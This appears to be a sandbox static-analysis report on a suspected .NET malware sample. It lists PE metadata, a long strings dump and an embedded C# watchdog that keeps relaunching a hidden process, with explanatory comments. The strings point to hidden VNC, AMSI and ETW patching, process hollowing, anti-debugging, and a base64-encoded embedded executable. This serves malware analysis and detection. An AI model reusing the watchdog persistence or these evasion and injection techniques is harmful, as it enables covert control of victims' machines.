Static | ZeroBOX

PE Compile Time

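2038-05-07 06:56:32 (future-dated relative to the 2022 copyright in the version resource below, so not a trustworthy build time; .NET deterministic builds and deliberate timestamp forgery both produce values like this)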

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00080914 0x00080a00 4.0546732606
.rsrc 0x00084000 0x0000059e 0x00000600 4.06687105279
.reloc 0x00086000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000840a0 0x00000314 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000843b4 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPa
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Management;
using System.Threading;
using System.Windows.Forms;
namespace icarus
class Program
/// <summary>
/// Entry point of the embedded watchdog source: starts the monitored executable once,
/// then re-checks it on a one-second timer and never returns.
/// </summary>
// NOTE(review): "%NAME%" and "%PATH%" in this class look like template placeholders that are
// substituted before the text is compiled (the strings dump also lists CSharpCodeProvider and
// CompileAssemblyFromSource) - this cannot be confirmed from the listing alone.
[STAThread]
public static void Main()
{
// Initial launch attempt; StartmyZed() only starts the target when no process with that name exists.
StartmyZed();
// Timer constructed with an interval of 1000 ms; each Elapsed event runs Timer_Elapsed.
System.Timers.Timer timer = new System.Timers.Timer(1000);
timer.Elapsed += Timer_Elapsed;
timer.Start();
// Empty infinite loop keeps the process alive so the timer keeps firing. It busy-waits rather
// than sleeping, so sustained CPU use by this process is an observable side effect.
while (true)
{
}
}
/// <summary>
/// Timer callback: relaunches the monitored executable when no process named "%NAME%" is running.
/// </summary>
/// <param name="sender">Timer that raised the event (unused).</param>
/// <param name="e">Elapsed event data (unused).</param>
// NOTE(detection): the visible effect is a child process that reappears shortly after being
// terminated, always spawned by this same parent; stopping the parent first ends the respawn cycle.
private static void Timer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{
// Look up running processes by name; "%NAME%" is the literal in this listing.
System.Diagnostics.Process[] proc = System.Diagnostics.Process.GetProcessesByName("%NAME%");
if (proc.Length > 0)
{
// Target is already running: nothing to do.
}
else
{
// No matching process found: start it again.
StartmyZed();
}
}
/// <summary>
/// Starts the executable at "%PATH%" with a hidden window, but only when no process
/// named "%NAME%" is currently running. All exceptions are discarded.
/// </summary>
public static void StartmyZed()
{
try
{
// UBound returns the highest index of the array, so a value below 0 means the
// process list is empty, i.e. the target is not running.
if (Information.UBound(Process.GetProcessesByName("%NAME%")) < 0)
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = @"%PATH%";
// Hidden window style: the launched program is asked to start without a visible window.
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(processStartInfo);
// The two lines below are disabled in the listing, so the watchdog does not exit after launching.
//Process.GetCurrentProcess().Kill();
//Application.Exit();
}
}
catch (Exception projectError)
{
// Visual Basic runtime helpers that record and then immediately clear the error;
// the net effect is that any failure (missing file, access denied, ...) is silently ignored
// and the next timer tick simply tries again.
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
v4.0.30319
#Strings
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
UL7GOPAFMSA0
VQKSESE2T2B0
SPDRP_UNUSED0
TXHSAXM66JP0
KRN8JXP13NR0
C8GA5S53INU0
J51Z2NGKOSU0
35ESNZMDXVY0
<WatchDogStart>b__0
string_0
registryKey_0
UNHDYV5BIO01
SPDRP_UNUSED1
9K0SFAV5ZQI1
2OHYL7DDS4J1
544Z8V0LGEL1
FALEOI2TYJM1
FIN_WAIT_1
List`1
Unused1
Reserved1
get_String1
remotePort1
localPort1
RIZP6FCCT112
LU59UJXPJJ12
SHELL32
kernel32
Microsoft.Win32
ToInt32
SPDRP_UNUSED2
LH9OAZ7XCGK2
AJS1EY0ZMLK2
FIN_WAIT_2
IDictionary`2
cbReserved2
lpReserved2
remotePort2
localPort2
0UBVLNDF3V33
WGACGIXG53J3
MAM388EMFVR3
PWEWVNYFDXT3
P4N7QSKC7NV3
remotePort3
localPort3
4JFH9AA98024
E0V5PCQ7MJ54
TOR0N6VA2X74
3QM3DIZDPHF4
TMRQSFOHH3I4
T1W9GI4MX2P4
remotePort4
localPort4
7YJM88AF10C5
KCV4RFZMRQJ5
N9F2QK5L9NV5
ToUInt16
ToInt16
JHGWBU2YBKB6
S68W916YBTD6
ALU568Q2DUO6
UX6X1490DGG7
YZGT5JN1GF38
P87JPMP8T1C8
get_UTF8
WMHIQVFLKAK8
C0B3UBAVL2U8
GNYLUFAVSS19
GPSS2Z8PHY59
X7GB7TLKCHL9
05NH3J796PS9
09KXO5EZUIT9
GVJVXD8M1AW9
QAAK2HH2JUW9
P1EZJKS1L20A
KC8NL3HDBLBA
1F1YCFO7WWDA
TIA6476UQVFA
SPDRP_DEVICE_POWER_DATA
AVENX1SSSATA
CreateProcessA
LoadLibraryA
049RHO15RY4B
AEK56I34EA5B
FSP4KRFM6EDB
R9KCIYYKLRFB
BI_RGB
OX54VKLOLVJB
LK2MSIKCBNXB
UHJ0YNH43O6C
8W1V8W6T2CBC
hSrcDC
CreateCompatibleDC
ReleaseDC
DeleteDC
hDestDC
GetWindowDC
EKQL3IF474FC
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
2N9KFWW49CGC
UDP_TABLE_BASIC
1FN36K3C47JC
KillHVNC
StartHVNC
SPDRP_DEVICEDESC
BDWN8RQ1TPSC
P6OWEKW57PUC
AYOLM0TW3YUC
LWMPHYTGFCYC
WTCQJGHBLV8D
ORHGE6XW63CD
ESTABLISHED
SHGFI_ATTR_SPECIFIED
WS_DISABLED
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
CLOSED
SHGFI_SELECTED
WS_EX_COMPOSITED
1XNGVZEX9XED
SW_SHOWMINIMIZED
SW_SHOWMAXIMIZED
SPDRP_HARDWAREID
UDP_TABLE_OWNER_PID
SPDRP_BUSTYPEGUID
SPDRP_CLASSGUID
GetMenuItemID
sessionID
m_lstProcessID
processID
I9S6SSAC4NKD
SRCAND
WM_SYSCOMMAND
DESKTOP_JOURNALRECORD
YG4FX4XBPYRD
QXHSP7011SSD
HYM5QOJVK8TD
SYN_RCVD
ExclusionWD
VNJZ29BAJQYD
DIGCF_DEVICEINTERFACE
SPDRP_SERVICE
SW_HIDE
SPDRP_REMOVAL_POLICY_OVERRIDE
L4RSAU78Z6IE
DIGCF_PROFILE
UDP_TABLE_OWNER_MODULE
GWL_STYLE
CCHDEVICENAME
SHGFI_TYPENAME
CCHFORMNAME
SHGFI_DISPLAYNAME
SPDRP_FRIENDLYNAME
UOI_NAME
SPDRP_ENUMERATOR_NAME
SPDRP_PHYSICAL_DEVICE_OBJECT_NAME
DESKTOP_NONE
HALFTONE
SHGFI_EXETYPE
SPDRP_LEGACYBUSTYPE
SPDRP_DEVTYPE
EDWSB12740RE
SC_RESTORE
S_FALSE
HTCLOSE
WM_CLOSE
DESKTOP_ENUMERATE
SPDRP_INSTALL_STATE
SPDRP_EXCLUSIVE
WM_MOUSEMOVE
SC_MINIMIZE
SC_MAXIMIZE
SHGFI_SHELLICONSIZE
C9A90VBHOB2F
SMQ922T4N84F
1Y12I4US4FEF
S3GI0KBA3SHF
OHLT1P5C4UHF
HERJHFR2ZXSF
LOQFJR0Q5Q1G
KPWJLTLET05G
LUTNE1U60B9G
T2W5HBEZGJBG
4OLXULEEDREG
SPDRP_MFG
LISTENING
CLOSING
E_INVALIDARG
360UZROZA9TG
5TCSVNWMH0WG
CDSQEKCY1XCH
YVKUIO4MC9JH
N01UYOSNF6KH
MAX_PATH
K3DYQ2M0BJ1I
VNX5V6Y2VU6I
D4558SL97BKI
I0HWJYHI42LI
8GG04N071YPI
HZYUW388BKUI
UpdateDriverUI
YRLOQTKLCOMJ
2OEB16IDQKQJ
QTC8PG9M79UJ
BNAG4D2ITQXJ
3RNHZM7LRTXJ
DESKTOP_JOURNALPLAYBACK
LAST_ACK
E7HW7UVECHIK
WM_LBUTTONDBLCLK
WM_RBUTTONDBLCLK
GY27R5V0H6MK
DF_ALLOWOTHERACCOUNTHOOK
BRODLN3KG5PK
GVRZ438VYLPK
QKI5QFUI2WVK
UNXCAJDGTYYK
DJQ1K89PRR2L
SW_NORMAL
SHGFI_PIDL
B282ONV4NUDL
WM_MOUSEWHEEL
M1JOL6YMQTEL
EEAWBFDGZEFL
GENERIC_ALL
TCP_TABLE_BASIC_ALL
TCP_TABLE_OWNER_PID_ALL
TCP_TABLE_OWNER_MODULE_ALL
WM_HSCROLL
WM_VSCROLL
DESKTOP_HOOKCONTROL
BIG1KADY5SJM
JE5GDJ0TC2LM
BBT14KHXVMNM
HTBOTTOM
JAFV2RDWG5VM
C8EMFYK3RA0N
X12JRT72FL0N
Y8KKA948PM0N
SEVU8OU2LZ3N
AQ2QXKKSWQ7N
SM_CXSCREEN
SM_CYSCREEN
KHWXPA6RC3JN
SHGFI_LARGEICON
SHGFI_SMALLICON
SHGFI_OPENICON
SHGFI_ICON
SHGFI_ICONLOCATION
SPDRP_LOCATION_INFORMATION
STARTF_USEPOSITION
HTCAPTION
MK_LBUTTON
HTMINBUTTON
MK_RBUTTON
HTMAXBUTTON
SB_LINEDOWN
WM_LBUTTONDOWN
WM_RBUTTONDOWN
WM_KEYDOWN
HYLNLWEGFQZN
2ND5LEAICY0O
GCCLAZHZ1Y5O
PQRN961QXN8O
System.IO
9IC6YBW99T8P
DELETE_TCP
C4LWJA6ZHDGP
1GUA4MT9A5MP
DESKTOP_SWITCHDESKTOP
JUS56OXRKJQP
SB_LINEUP
WM_LBUTTONUP
WM_RBUTTONUP
WM_KEYUP
SLI2K08TAK4Q
9SQZWBNBEW5Q
QT4M4AM713HQ
YBN5ETWY8FXQ
PAK8JBZ8891R
ANC7FYTPA22R
WM_CHAR
SPDRP_BUSNUMBER
SPDRP_UI_NUMBER
TCP_TABLE_BASIC_LISTENER
TCP_TABLE_OWNER_PID_LISTENER
TCP_TABLE_OWNER_MODULE_LISTENER
SPDRP_DRIVER
8M3118BCV3GR
W3Q84HSCKNGR
07VED4KXLMKR
GDI_ERROR
C33F13T0Q2UR
SUJTECED3CVR
LOXV7ZO7VA1S
SPDRP_CHARACTERISTICS
CYLT4GJ5UDDS
SPDRP_COMPATIBLEIDS
SPDRP_SECURITY_SDS
SPDRP_CAPABILITIES
STARTF_USESTDHANDLES
DIGCF_ALLCLASSES
SHGFI_USEFILEATTRIBUTES
SHGFI_ATTRIBUTES
SPDRP_CONFIGFLAGS
MFB9JSUSOFHS
SPDRP_LOCATION_PATHS
VF2W3Y38ELLS
TCP_TABLE_BASIC_CONNECTIONS
TCP_TABLE_OWNER_PID_CONNECTIONS
TCP_TABLE_OWNER_MODULE_CONNECTIONS
SPDRP_UPPERFILTERS
SPDRP_LOWERFILTERS
DIB_RGB_COLORS
SPDRP_CLASS
NORMAL_PRIORITY_CLASS
SPDRP_ADDRESS
K2CLSFFA89TS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
ES_CONTINUOUS
SHGFI_ADDOVERLAYS
1E7PJT5DZK3T
MCDH38EBX86T
SPDRP_UI_NUMBER_DESC_FORMAT
SJUFKBKJMEDT
HTBOTTOMLEFT
HTTOPLEFT
HTLEFT
HTBOTTOMRIGHT
HTTOPRIGHT
HTRIGHT
TIME_WAIT
CLOSE_WAIT
DIGCF_DEFAULT
SPDRP_REMOVAL_POLICY_HW_DEFAULT
HTTRANSPARENT
DIGCF_PRESENT
SYN_SENT
KC9HD0RS43RT
GW_HWNDLAST
WM_NCHITTEST
WZ51FJAGELST
GW_HWNDNEXT
PMVG173Y156U
ZGIOB3R4SL6U
4D5GKWRODRKU
DESKTOP_CREATEMENU
MN_GETHMENU
NX2PGVNZEJTU
VBEIXK7UQ4UU
1GXBYWP3EO1V
VDGQNOA80H4V
HTTPUWU5L78V
GHLML8WSFIDV
GW_HWNDPREV
RNRLXQLWP6IV
V1KGM74UX0OV
7C105GZXHVAW
9EO7YCBTSMEW
3DYOJCSE7YEW
B0M0DQ3S1VJW
YK9FAX1L79MW
DESKTOP_CREATEWINDOW
STARTF_USESHOWWINDOW
LKW71P2FI1TW
JQOQGQMMKPUW
CreateFileW
CreateDesktopW
TD7UTAAY3A1X
YM05VNKN4X3X
46784DJU25DX
SHGFI_SYSICONINDEX
SHGFI_OVERLAYINDEX
TKLSHM9FZVEX
72DUFN8AQNHX
C2ZIUDTD9HIX
SS5QVPWCMTIX
5HNVM6ULUWQX
IS7WO8NMQ5ZX
7TBKSUID2QZX
7OZU3KM0TA2Y
B7UXP2V8DN3Y
SHGFI_LINKOVERLAY
SPDRP_REMOVAL_POLICY
09HZ2YJVY6GY
E7U4F68MWCGY
SRCCOPY
E_OUTOFMEMORY
SPDRP_SECURITY
RC88LH4CKMTY
VT6D14VEFVWY
LJKTQXILLZEZ
VOIWZGV5GROZ
EJN36Q2U65WZ
value__
DestroypublicData
DestroyWizardData
DeviceInfoData
deviceInfoData
SizeOfRawData
PointerToRawData
dwData
hwinsta
mscorlib
ConfigSpecific
System.Collections.Generic
AddPropertyPageBasic
Microsoft.VisualBasic
lpEnumFunc
DesktopProc
DesktopWindowsProc
hdcSrc
get_Id
GetThreadId
GetCurrentThreadId
dwThreadId
ProcessIdToSessionId
GetProcessId
GetCurrentProcessId
dwProcessId
processId
GetProcessById
OpenRead
bytesRead
ResumeThread
hThread
ProcessThread
thread
rgbRed
AddPropertyPageAdvanced
AddRemotePropertyPageAdvanced
lpnLengthNeeded
IsInstalled
IsZoomed
samDesired
biClrUsed
CheckDisposed
m_disposed
rgbReserved
lpReserved
reserved
System.Collections.Specialized
Synchronized
owningPid
ClassGuid
FixedElementField
showCmd
ReadToEnd
Append
RegistryValueKind
UBound
EnumHwndsPrintMethod
method
InstallWizard
Replace
CalcDiskSpace
FoundDevice
InstallDevice
RegisterDevice
SelectDevice
lpszDevice
device
defaultInstance
hdcSource
CompileAssemblyFromSource
deviceMode
FileMode
shareMode
iStretchMode
SetStretchBltMode
pDevmode
biSizeImage
GetWindowImage
iUsage
uUsage
get_Message
SendMessage
uCallbackMessage
SHAppBarMessage
PostMessage
dwMessage
StateChange
PropChange
PropertyChange
PowerMessageWake
EndInvoke
BeginInvoke
GetExtendedTcpTable
pTcpTable
GetExtendedUdpTable
pUdpTable
ICloneable
Enable
Disable
IDisposable
IsWindowVisible
compatible
get_Handle
ThreadHandle
RuntimeFieldHandle
wndHandle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
TokenHandle
get_DesktopHandle
desktopHandle
ProcessHandle
bInheritHandle
SetFileInformationByHandle
m_handle
Rectangle
templateFile
DeleteFile
InstallFile
HwProfile
IsInRole
WindowsBuiltInRole
FreeConsole
lpTitle
hModule
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
procName
get_FileName
set_FileName
GetModuleFileName
lpModuleName
szTypeName
get_FullName
lpApplicationName
applicationName
get_DesktopName
GetDesktopName
m_desktopName
bAppName
lpClassName
GetClassName
get_ProcessName
lpWindowName
GetProcessesByName
szDisplayName
DirectoryName
lpFilename
filename
lpCommandLine
commandLine
WriteLine
Combine
CallbackRoutine
propertyRegDataType
ValueType
cchType
CallbackType
SecurityProtocolType
dumpType
pszType
Prepare
SetProcessDPIAware
get_Culture
set_Culture
resourceCulture
MethodBase
ReadOnlyCollectionBase
ApplicationSettingsBase
Dispose
StartProcesse
Create
MulticastDelegate
EditorBrowsableState
SetThreadExecutionState
SetApartmentState
Delete
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
UnsafeValueTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
FixedBufferAttribute
UnmanagedFunctionPointerAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
dLByte
rgbBlue
GetValue
SetValue
set_Expect100Continue
caseInsensitive
UnRemove
dwXSize
dwYSize
get_Size
cbSize
requiredSize
biSize
VirtualSize
propertyBufferSize
bufferSize
classInstallParamsSize
dwSize
SuppressFinalize
buffersize
NewDeviceWizardPreAnalyze
NewDeviceWizardPostAnalyze
SizeOf
IndexOf
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
lpString
GetString
Substring
disposing
System.Drawing
dwNewLong
GetWindowLong
SetWindowLong
set_ErrorDialog
get_ExecutablePath
get360InstallPath
GetTempPath
GetFolderPath
pszPath
get_Width
nSrcWidth
biWidth
nWidth
nDestWidth
get_Length
FileNameLength
MaxWindowNameLength
nLength
length
LoadApi
CreateApi
PatchingAmsi
PtrToStringAnsi
AsyncCallback
VmPreReadCallback
VmPostReadCallback
IncludeThreadCallback
IncludeModuleCallback
ReadMemoryFailureCallback
IoFinishCallback
CancelCallback
IoWriteAllCallback
IncludeVmRegionCallback
WriteKernelMinidumpCallback
SecondaryFlagsCallback
KernelMinidumpStatusCallback
IsProcessSnapshotCallback
VmStartCallback
IoStartCallback
ThreadExCallback
VmQueryCallback
RemoveMemoryCallback
callback
tosuck
accessMask
g_hDesk
AllocHGlobal
FreeHGlobal
Marshal
System.Security.Principal
WindowsPrincipal
ConfigGeneral
DetectCancel
System.ComponentModel
GetPixel
NewDeviceWizardFinishInstall
AllowInstall
gdi32.dll
advapi32.dll
kernel32.dll
shell32.dll
user32.dll
iphlpapi.dll
setupapi.dll
dbghelp.dll
set_SecurityProtocol
lpwndpl
FileStream
CallbackParam
callbackParam
lParam
userStreamParam
expParam
wParam
lparam
wparam
get_Item
System
Random
random
Bottom
resourceMan
uStartScan
Boolean
dwOutBufLen
hidden
rgbGreen
hDCScreen
hDcScreen
IsBlackScreen
bmpScreen
ptScreen
m_lstScreen
OpenProcessToken
get_IsOpen
KillProcessAndChildren
CollectProcessAndChildren
lpNumberOfBytesWritten
bytesWritten
AppDomain
DrawIcon
ipVersion
biCompression
Application
set_IncludeDebugInformation
lpProcessInformation
processInformation
GetUserObjectInformation
pfileinformation
System.Configuration
GetProcessWindowStation
System.Globalization
Interaction
ZwUnmapViewOfSection
System.Reflection
ProcessThreadCollection
StringCollection
CompilerErrorCollection
ManagementObjectCollection
DiFunction
lpEnumCallbackFunction
installFunction
rcNormalPosition
ptMinPosition
ptMaxPosition
creationDisposition
CallingConvention
ObjectDisposedException
ArgumentException
FormatScreenResolution
resolution
Environ
HandleRun
TryRun
EnumWindowsTopToDown
dwExtraInfo
FileBasicInfo
FileIdInfo
MethodInfo
FileStandardInfo
SetupDiEnumDeviceInfo
FileStorageInfo
cbFileInfo
FileEndOfFileInfo
SHGetFileInfo
FileNameInfo
FileRenameInfo
CultureInfo
FileAttributeTagInfo
FileRemoteProtocolInfo
FileStreamInfo
FileSystemInfo
lpSystemInfo
FileCompressionInfo
FileAllocationInfo
FileDispositionInfo
lpStartupInfo
startupInfo
ParameterInfo
GetCursorInfo
lpBitsInfo
FileAlignmentInfo
FileIoPriorityHintInfo
get_StartInfo
set_StartInfo
ProcessStartInfo
FileIdExtdDirectoryRestartInfo
FileIdBothDirectoryRestartInfo
FileFullDirectoryRestartInfo
pvInfo
FileIdExtdDirectoryInfo
FileIdBothDirectoryInfo
FileFullDirectoryInfo
RasterOp
CreateCompatibleBitmap
FromHbitmap
MiniDumpWriteDump
WatchDogStop
GetThreadDesktop
SetThreadDesktop
CloseDesktop
CreateDesktop
SwitchDesktop
OpenDesktop
lpDesktop
OpenDefaultDesktop
OpenInputDesktop
hNewDesktop
lpszDesktop
m_desktop
Microsoft.CSharp
FirstTimeSetup
remoteAddr
localAddr
bmiHeader
StreamReader
TextReader
CSharpCodeProvider
CodeDomProvider
StringBuilder
SpecialFolder
folder
lpBuffer
propertyBuffer
buffer
get_ResourceManager
ServicePointManager
ManagementObjectSearcher
System.CodeDom.Compiler
SetupDiCallClassInstaller
CurrentUser
biXPelsPerMeter
biYPelsPerMeter
ToGenericParameter
hWndInsertAfter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
Troubleshooter
BitConverter
ValidateDriver
ToLower
set_RedirectStandardError
hStdError
CompilerError
hCursor
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
Monitor
lpSecurityDescriptor
IntPtr
dwFileAttribs
GetSystemMetrics
Characteristics
System.Diagnostics
get_Threads
get_Bounds
InstallInterfaces
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
AssignResources
IcarusStub.Properties.Resources.resources
DebuggingModes
referencedAssemblies
dwNumEntries
Properties
bInheritHandles
inheritHandles
InstallDeviceFiles
biPlanes
cScanLines
GetProcesses
GetInputProcesses
set_Attributes
lpThreadAttributes
threadAttributes
flagsAndAttributes
FileAttributes
lpProcessAttributes
processAttributes
dwAttributes
attributes
ReadAllBytes
WriteAllBytes
BufferBytes
GetBytes
dwCreationFlags
creationFlags
esFlags
uFlags
dwFlags
SetupDiSetClassInstallParams
classInstallParams
System.Windows.Forms
get_AllScreens
Contains
Conversions
NumberOfRelocations
PointerToRelocations
System.Collections
ulOptions
set_CompilerOptions
ptScreenPos
GetCursorPos
SetWindowPos
EnumDesktops
GetDesktops
get_Chars
dwXCountChars
dwYCountChars
NumberOfLinenumbers
PointerToLinenumbers
RegisterCoInstallers
RuntimeHelpers
getRandomCharacters
CompilerParameters
GetParameters
ValidateClassDrivers
InstallClassDrivers
SelectClassDrivers
bmiColors
get_Errors
EnableClass
tblClass
RealGetWindowClass
fileinformationclass
dwDesiredAccess
desiredAccess
FileAccess
IsWow64Process
CreateProcess
hProcess
GetCurrentProcess
StartProcess
process
IPAddress
GetProcAddress
lpBaseAddress
baseAddress
get_LocalAddress
VirtualAddress
lpAddress
address
AccessRights
StretchDIBits
GetDIBits
lpBits
lpvBits
CompilerResults
set_Arguments
get_Exists
ReplaceIfExists
status
SetupDiGetClassDevs
EnumDesktopWindows
GetWindows
m_windows
Concat
Format
lpRect
GetWindowRect
ManagementBaseObject
DeleteObject
hObject
SelectObject
ManagementObject
object
NewDeviceWizardSelect
NewDeviceWizardPreSelect
Detect
lpflOldProtect
flNewProtect
protect
System.Net
DeviceInfoSet
deviceInfoSet
alphabet
Offset
get_Height
nSrcHeight
biHeight
nHeight
nDestHeight
op_Explicit
fInherit
WaitForExit
hdcBlt
StretchBlt
BitBlt
get_Default
IAsyncResult
DialogResult
hkResult
result
biClrImportant
WebClient
ScreenToClient
GetWindowPlacement
System.Management
lpEnvironment
environment
hWndParent
hwndParent
GetParent
get_Current
GetCurrent
SetCurrent
pbDebuggerPresent
CheckRemoteDebuggerPresent
IsDebuggerPresent
keybd_event
mouse_event
bRepaint
MenuItemFromPoint
ChildWindowFromPoint
lpPoint
get_EntryPoint
get_Count
biBitCount
nMaxCount
BCutEncrypt
ParameterizedThreadStart
WatchDogStart
Convert
get_RemotePort
get_LocalPort
localPort
nXDest
nYDest
hdcDest
GetProcessIDList
get_List
GetScreenList
SetupDiDestroyDeviceInfoList
ArrayList
DevInst
hStdInput
CallbackInput
OpenInput
set_RedirectStandardOutput
hStdOutput
CallbackOutput
MoveNext
System.Text
get_Text
injText
GetWindowText
m_text
Wow64GetThreadContext
Wow64SetThreadContext
context
SelectBestCompatDrv
FindWindow
GetForegroundWindow
SetForegroundWindow
GetConsoleWindow
MoveWindow
set_CreateNoWindow
GetTopWindow
GetDesktopWindow
g_hCurWindow
GetWindow
GetCurrentWindow
SetCurrentWindow
PaintWindow
PrintWindow
m_lstWindow
GetNextWindow
wShowWindow
nCmdShow
PatchingEtw
VirtualAllocEx
VirtualProtectEx
RegOpenKeyEx
smIndex
nIndex
MemberIndex
MessageBox
processx
InitializeArray
ToCharArray
CreateSubKey
OpenSubKey
subKey
GetRegKey
RegistryKey
checksubkey
DetectVerify
get_Assembly
set_OutputAssembly
BlockCopy
LoadLibrary
ReadProcessMemory
WriteProcessMemory
CopyMemory
CreateDirectory
lpCurrentDirectory
currentDirectory
RootDirectory
InstallRegistry
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
SetupDiGetDeviceRegistryProperty
property
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
H82VDNAHSST6
BFK7OYICE384
1QNJUQZJVIL6
NX1HD5957KE9
V0HIUA9OA73X
$f3acc6fb-8e6f-4327-b555-7e83471e1656
91WC3KL33OT0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
XSystem.Byte, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
String1
! " # $ %$& ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C EDFDGDJIKIONPNQNRNSNTNUNVNWNXNYN]\
a2VybmVsMzI=
UmVzdW1lVGhyZWFk
V293NjRTZXRUaHJlYWRDb250ZXh0
U2V0VGhyZWFkQ29udGV4dA==
V293NjRHZXRUaHJlYWRDb250ZXh0
R2V0VGhyZWFkQ29udGV4dA==
VmlydHVhbEFsbG9jRXg=
V3JpdGVQcm9jZXNzTWVtb3J5
UmVhZFByb2Nlc3NNZW1vcnk=
bnRkbGw=
WndVbm1hcFZpZXdPZlNlY3Rpb24=
Q3JlYXRlUHJvY2Vzc0E=
U3RhcnQuZXhl
TVNCdWlsZHMuZXhl
Y3Z0cmVzYS5leGU=
WW91clBob25lLmV4ZQ==
UnVudGltZUJyb2tlci5leGU=
c3lzdGVtLmV4ZQ==
IC90YXJnZXQ6d2luZXhlIC9wbGF0Zm9ybTphbnljcHUgL29wdGltaXplKw==
JU5BTUUl
LmV4ZQ==
JVBBVEgl
Q29tcGlsZXJWZXJzaW9u
djQuMA==
c3Zsb3N0
c3Zsb3N0LmV4ZQ==
U3lzdGVtLmRsbA==
U3lzdGVtLk1hbmFnZW1lbnQuZGxs
U3lzdGVtLldpbmRvd3MuRm9ybXMuZGxs
U3lzdGVtLkRyYXdpbmcuZGxs
TWljcm9zb2Z0LlZpc3VhbEJhc2ljLmRsbA==
U3lzdGVtLlJlZmxlY3Rpb24uZGxs
U3lzdGVtLlRocmVhZGluZy5kbGw=
U3lzdGVtLlRocmVhZGluZy5UYXNrcy5kbGw=
U3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5kbGw=
L2sgc3RhcnQgL2Ig
ICAmIGV4aXQ=
UmVtb3RlRGVza3RvcA==
VHJ1ZQ==
Y3Z0cmVzLmV4ZQ==
V2luZG93c1xleHBsb3Jlci5leGU=
VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUoyNWdJMEFBQUFBQUFBQUFPQUFJZ0FMQVRBQUFQSUJBQUFJQUFBQUFBQUFWZzBDQUFBZ0FBQUFJQUlBQUFCQUFBQWdBQUFBQWdBQUJBQUFBQUFBQUFBR0FBQUFBQUFBQUFCZ0FnQUFBZ0FBQUFBQUFBTUFZSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFBRU5BZ0JQQUFBQUFDQUNBSFFGQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUVBQ0FBd0FBQUM0Q3dJQVZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEvUEVCQUFBZ0FBQUE4Z0VBQUFJQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQUhRRkFBQUFJQUlBQUFZQUFBRDBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYk